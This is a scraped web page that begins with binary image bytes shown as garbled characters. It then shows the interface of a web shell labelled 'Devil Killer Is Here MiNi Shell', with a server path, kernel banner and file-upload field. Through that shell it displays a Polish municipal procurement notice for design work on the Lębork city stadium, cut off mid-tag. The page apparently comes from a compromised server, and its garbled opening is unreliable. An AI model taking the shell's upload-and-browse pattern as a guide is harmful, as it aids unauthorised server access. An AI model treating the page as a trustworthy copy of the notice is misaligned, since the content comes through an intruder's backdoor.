JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230405/0016493801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowo-kosztorysowej rozbudowy Stadionu Miejskiego w Lęborku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Lębork</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979737</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lębork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">059 8637 753, 608584785</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@um.lebork.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lebork.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowo-kosztorysowej rozbudowy Stadionu Miejskiego w Lęborku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b38c199e-d2da-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00164938</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00057709/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Wykonanie dokumentacji projektowo-kosztorysowej rozbudowy Stadionu Miejskiego w Lęborku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lebork <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lebork</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Porozumiewanie się Zamawiającego<br/>z Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy Zakupowej (PZ)Urzędu Miasta Lębork<br/>https://platformazakupowa.pl/pn/lebork. Istnieje możliwość kierowania zapytania za pomocą środków komunikacji elektronicznej– email:<br/>inwestycje@um.lebork.pl-z zastrzeż. wymogów odnośnie poszczególnych oświadczeń i dokumentów określonych w niniejszej<br/>SWZ. 2.Zaleca się aby Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zam. publicznego,posiadał konto na PZ<br/>Urzędu Miasta Lębork. 3.Wymagania techn. i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej<br/>przy ich użyciu,opisane zostały w regulaminie korzystania z PZ dostępnym pod adresem https://platformazakupowa.pl/strona/1-<br/>regulamin .4.Maksymalny rozmiar plików przesyłanych za pośrednictwem PZ wynosi 150MB. 5.Za datę przekazania oferty,<br/>podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów,<br/>przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na PZ. 6.Zamawiający może również komunikować się z<br/>Wykonawcami za pomocą poczty elektronicznej, email:inwestycje@um.lebork.pl. 7.Dokumenty elektroniczne, oświadczenia lub<br/>elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem PZ jako załączniki. Sposób<br/>sporządzania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. (Dz. U. z 2020 r., poz. 2452).<br/>8.Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ. 9.Uprawnionym przez Zamawiającego do kontaktów z Wykonawcami jest mgr inż. Romuald<br/>Babul – Nacz Wydz Realizacji Inwestycji w siedzibie Zamawiającego, tel. 598637753,tel.kom.608584785.10.Wykonawca może<br/>zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Zamawiający jest zobowiązany udzielić wyjaśnień niezwłocznie, jednak nie<br/>później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynie do<br/>Zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert. Ewentualne przedłużenie terminu składania ofert nie<br/>wpływa na bieg terminu składania wniosków o wyjaśnienie treści SWZ. 11.Jeżeli wniosek o wyjaśnienie treści SWZ wpłynął po<br/>upływie terminu, o którym mowa w pkt 10. Zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz obowiązku przedłużenia<br/>terminu składania ofert.12.Treść zapytań wraz z wyjaśnieniami Zamawiający udostępnia, bez ujawniania źródła zapytania na stronie<br/>internetowej prowadzonego postępowania. 13.W uzasadnionych przypadkach Zamawiający może przed upływem terminu składania<br/>ofert zmienić treść SWZ. 14.W przypadku gdy zmiana treści SWZ jest istotna dla sporządzenia oferty lub wymaga od wykonawców<br/>dodatkowego czasu na zapoznanie się ze zmianą treści SWZ i przygotowanie ofert, zamawiający przedłuża termin składania ofert o<br/>czas niezbędny na ich przygotowanie. Zamawiający informuje wykonawców o przedłużonym terminie składania ofert przez<br/>zamieszczenie informacji na stronie internetowej prowadzonego postępowania, na której została udostępniona SWZ. 15.Dokonaną<br/>zmianę treści SWZ Zamawiający udostępnia na stronie internetowej prowadzonego postępowania. 16.Zamawiający może zmienić<br/>ogłoszenie, zamieszczając w Biuletynie Zamówień Publicznych ogłoszenie o zmianie ogłoszenia. 17.W przypadku dokonywania<br/>zmiany treści ogłoszenia o zamówieniu, zamawiający przedłuża termin składania ofert o czas niezbędny do wprowadzenia zmian w<br/>ofertach, jeżeli jest to konieczne. 18.Zamawiający oświadcza, że nie będzie organizował zebrania informacyjnego w celu wyjaśnienia<br/>treści SWZ dla przyszłych Wykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych ) (Dz. Urz. UE<br/>L 119 z 04.05.2016 r., str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1.1.administratorem danych osobowych jest Urząd Miejski w Lęborku, ul. Armii Krajowej 14, 84 300 Lębork, tel. 59 8624 280;<br/>1.2.inspektorem ochrony danych osobowych w Urzędzie Miejskim w Lęborku jest pani Bożena Steciuk, e-mail: iod@um.lebork.pl, tel.<br/>59 8637 733;<br/>1.3.dane osobowe przekazane przez Wykonawcę przetwarzane będą na podstawie art. 6 ust. 1 lit c RODO w celu związanym z<br/>niniejszym postępowaniem o udzielenie zamówienia publicznego na Wykonanie dokumentacji projektowo-kosztorysowej rozbudowy<br/>Stadionu Miejskiego w Lęborku, prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji na podst.art.275 pkt.1.<br/>1.4.odbiorcami danych osobowych przekazanych przez Wykonawcę będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych<br/>(Dz. U. z 2018 r. poz. 1986, 2215, z 2019 r. poz. 53.), dalej Ustawa Pzp;<br/>1.5.dane osobowe przekazane przez Wykonawcę będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 5 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia;<br/>1.6.obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>1.7.w odniesieniu do danych osobowych przekazanych przez Wykonawcę decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>Ogłoszenie nr 2023/BZP 00024319/01 z dnia 2023-01-11<br/>2023-01-11 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>1.8.Wykonawca posiada:<br/>1.8.1.na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>1.8.2.na podstawie art. 16 RODO prawo do sprostowania danych osobowych Wykonawcy;<br/>1.8.3.na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>1.8.4.prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie danych<br/>osobowych dotyczących Wykonawcy narusza przepisy RODO;<br/>1.9.Wykonawcy nie przysługuje:<br/>1.9.1.w związku z art. 17 ust. 3 lit. b d lub e RODO prawo do usunięcia danych osobowych;<br/>1.9.2.prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.Z.21.2023.G</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 155988,86 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej dla zadania: Rozbudowa Stadionu Miejskiego w Lęborku poprzez budowę budynku zaplecza z trybunami na ok. 950 osób, z zadaszeniem oraz niezbędną infrastrukturą.<br/><br/>1.	Numer kategorii wg Wspólnego Słownika Zamówień: <br/>71320000-7 – Usługi inżynieryjne w zakresie projektowania <br/>71220000-6 – Usługi projektowania architektonicznego<br/>71240000-2 – Usługi architektoniczne, inżynieryjne i planowania<br/>71244000-0 - Kalkulacja kosztów, monitoring kosztów<br/>2.	Zakres zamówienia obejmować będzie :<br/>2.1.	Poglądowe rozmieszczenie oczekiwanego zakresu projektu pokazane jest na Załączniku nr 10 Do SWZ<br/>2.2.	Nowy budynek stadionu – funkcje:<br/>2.2.1.	Zaplecze sanitarne dla całego obiektu sportowego z dostępem od zewnątrz (dla kibiców i użytkowników obiektu- kobiety, mężczyźni, osoby niepełnosprawne)<br/>2.2.2.	Piwnica:<br/>a)	Garaże dla pojazdów obsługujących obiekt z dostępem od zewnątrz <br/>b)	Pomieszczenia magazynowe przeznaczone na potrzeby Centrum Sportu i Rekreacji (CSiR),<br/>c)	2 pomieszczenia dla pracowników obsługi z zapleczem sanitarnym<br/>d)	Pomieszczenie techniczne na sprzęt nagłaśniający<br/>e)	2 małe szatnie z zapleczem sanitarnym<br/>2.2.3.	Parter:<br/>a)	4 duże szatnie min. 30 m2 oraz zaplecze sanitarne dla każdej szatni oraz 4 pomieszczenia niedaleko każdej szatni po ok. 14-16 m2 każde<br/>b)	2 szatnie dla sędziów z zapleczem sanitarnym<br/>c)	2 pomieszczenia dla opieki medycznej<br/><br/>2.2.4.	I piętro:<br/>a)	8 pomieszczeń biurowych na potrzeby CSiR (pomieszczenia klimatyzowane, w tym serwerownia) <br/>b)	Pomieszczenie socjalne dla pracowników<br/>c)	Sala konferencyjna min. 40 m2<br/>d)	Toalety<br/>e)	Pomieszczenie dla obserwatora i delegata<br/>f)	Sala prasowa<br/>g)	Loża VIP<br/>2.2.5.	Obiekt powinien być dostępny dla osób niepełnosprawnych (winda)<br/>2.3. Trybuny:<br/>2.3.1.	Ilość miejsc ok. 950<br/>2.3.2.	Zadaszenie<br/>2.3.3.	Zaplecze socjalne <br/>2.3.4.	Również na bazie budynku (pkt. 2.2.)<br/>2.4. Oświetlenie płyt boiska<br/>2.5.	Monitoring całego stadionu<br/>2.6. Punkt kasowy, depozyt oraz wysokie kołowrotki przy wejściu na stadion<br/>2.7. Portiernia/ dyżurka firmy ochroniarskiej - do rozważenia<br/>2.8. Wymiennikownia c.o.<br/>2.9.	Drogi dojazdowe<br/>2.10.	Tablica wyników (na płytę główna i boczną)<br/>2.11. Dokumentacja powinna zawierać również:<br/>2.11.1.	Projekty niezbędnych instalacji: elektrycznych, teletechnicznych (internet), słaboprądowych, sanitarnych w zakresie instalacji wodno – kanalizacyjnych, c. o., wentylacji, klimatyzacji, ppoż, instalacja odgromowa<br/>2.11.2.	Instrukcję bezpieczeństwa pożarowego<br/>2.11.3.	Projekt aranżacji wnętrz wszystkich pomieszczeń (z uwzględnieniem materiałów wykończeniowych, rozmieszczenie elektroinstalacji tj. gniazd, łączników, punków świetlnych, stolarki drzwiowej, sanitariatów, armatury, mebli)<br/>2.11.4.	Projekt rozbiórki lub przebudowy istniejących obiektów budowlanych, które wejdą w konflikt z projektowaną drogą jeśli będzie to wymagane,<br/>2.11.5.	Rozwiązania projektowe dla wszystkich kolizji (Zamawiający nie uzyskiwał warunków przebudowy kolidującej infrastruktury)<br/>2.12.	Wykonawca zleci we własnym zakresie opracowanie mapy do celów projektowych dla zadania. Kopię mapy należy przekazać Zamawiającemu;<br/>2.13.	Wykonawca wykona badania gruntowe w zakresie niezbędnym do realizacji zamówienia.<br/>2.14.	Dokumentacja musi zostać uzgodniona z PZPN – dla III ligi<br/>2.15.	Należy uzyskać decyzje, opinie, sprawdzenia, warunki uzgodnienia i zatwierdzenia dokumentacji projektowej wymagane przepisami prawa, w tym uzgodnienia z zamawiającym, rzeczoznawcami p.poż., sanit.-hig., bhp, ochroną środowiska, uzgodnienie projektu z gestorami sieci i innych wymaganych do uzyskania pozwolenia na budowę<br/>3.	Realizacja zamówienia ma obejmować: <br/>3.1.	opracowanie projektu budowlanego w sposób zgodny z wymaganiami ustawy Prawo budowlane, ustaleniami określonymi w decyzjach administracyjnych dotyczących zamierzenia budowlanego, obowiązującymi przepisami oraz zasadami wiedzy technicznej oraz innych dokumentów niezbędnych do uzyskania pozwolenia na budowę – w 5 egz. (plus wersja elektroniczna w ogólnie dostępnym formacie .pdf i .dwg);<br/>3.2.	opracowanie dokumentacji projektowej zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20.12.2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego obejmującej wykonanie:<br/>- projektu budowlanego w zakresie uwzględniającym specyfikę robót budowlanych – w 5 egz. (plus wersja elektroniczna w ogólnie dostępnym formacie .pdf i .dwg);<br/>- projektu wykonawczego w zakresie, o którym mowa w § 5 w/w Rozporządzenia -– w 4 egz. (plus wersja elektroniczna w ogólnie dostępnym formacie);<br/>3.3.	specyfikacji technicznej wykonania i odbioru robót budowlanych – w 4 egz. (plus wersja elektroniczna w ogólnie dostępnym formacie .pdf i .dwg);<br/>3.4.	przedmiaru robót w zakresie, o którym mowa w § 6 w/w Rozporządzenia – w 4 egz. (plus wersja elektroniczna w ogólnie dostępnym formacie .pdf i .dwg);<br/>3.5.	kosztorysu inwestorskiego – w 4 egz. (plus wersja elektroniczna w ogólnie dostępnym formacie);<br/>3.6.	informację dotyczącą bezpieczeństwa i ochrony zdrowia, w przypadkach gdy ich opracowanie jest wymagane - w 4 egzemplarzach (plus wersja elektroniczna w ogólnie dostępnym formacie). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71244000-0 - Kalkulacja kosztów, monitoring kosztów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający przy wyborze najkorzystniejszej oferty posługiwać się będzie następującymi kryteriami:<br/>a. Kryterium „Cena oferty” (C) - waga kryterium 60%<br/>Przyjmuje się, że oferta z najniższą ceną otrzyma 60 pkt.<br/><br/>cena najniższa<br/>C = ----------------------------------------- x 60 pkt<br/>cena danego Wykonawcy<br/><br/>b. Kryterium „Okres rękojmi” – okres rękojmi za wady fizyczne i prawne dokumentacji – 40%.<br/>Oceny kryterium R - okres rękojmi wymagany przez Zamawiającego w zakresie od 36 miesięcy do 78 miesięcy dokonuje się w<br/>następujący sposób:<br/>− oferta, w której przewidziano max (najdłuższy) okres otrzyma 40 punktów, z tym, że za najdłuższy okres Zamawiający przyjmuje<br/>max. 78 miesięcy (pełnych miesięcy). Jeżeli Wykonawca wskaże w ofercie okres rękojmi powyżej 78 miesięcy Zamawiający przyjmie<br/>do obliczeń wartość 78 miesięcy;<br/>− pozostałe oferty są punktowane liniowo wedle następującej formuły arytmetycznej:<br/><br/>(Xi – 36)<br/>R = ilość punktów = --------------------- * 40 pkt.<br/>(78 - 36)<br/><br/>gdzie:<br/>Xi - ilość pełnych miesięcy rękojmi ocenianej oferty (nie mniej niż obowiązkowa 36 miesięcy i nie więcej niż max ilość 78 miesięcy).<br/>UWAGA:<br/>Czas trwania okresu rękojmi należy określić w pełnych miesiącach, liczony od miesiąca następnego, w którym nastąpił odbiór<br/>końcowy przedmiotu zamówienia.<br/>W przypadku, gdy Wykonawca złoży ofertę, w której wskaże okres rękojmi poniżej 36 miesięcy, oferta będzie potraktowana jako<br/>niezgodna z treścią SWZ i zostanie odrzucona.<br/>2. Łączna punktacja oferty = suma punktów (C + R)<br/>gdzie:<br/>C – liczba punktów jaką może zdobyć oferta (Wykonawca) za kryterium „Cena”<br/>R – liczba punktów jaką może zdobyć oferta (Wykonawca) za kryterium „Okres rękojmi”<br/>Maksymalna liczba punktów: 100<br/>3. Oferta, która uzyska najwyższą łączną punktację, uważana jest za ofertę najwyżej ocenioną.<br/>4. Maksymalna ilość punktów, jaką może zdobyć Wykonawca uwzględniając wszystkie kryteria oceny ofert wynosi 100 pkt. Za<br/>najwyżej ocenioną zostanie uznana oferta, która otrzyma najwyższą liczbę punktów. W przypadku równej ilości punktów za najwyżej<br/>ocenioną ofertę zostanie uznana oferta, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>5. Brak wypełnienia przez Wykonawcę w formularzu oferty ceny lub innego kryterium oceny ofert spowoduje odrzucenie oferty, jako<br/>niezgodnej z treścią SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 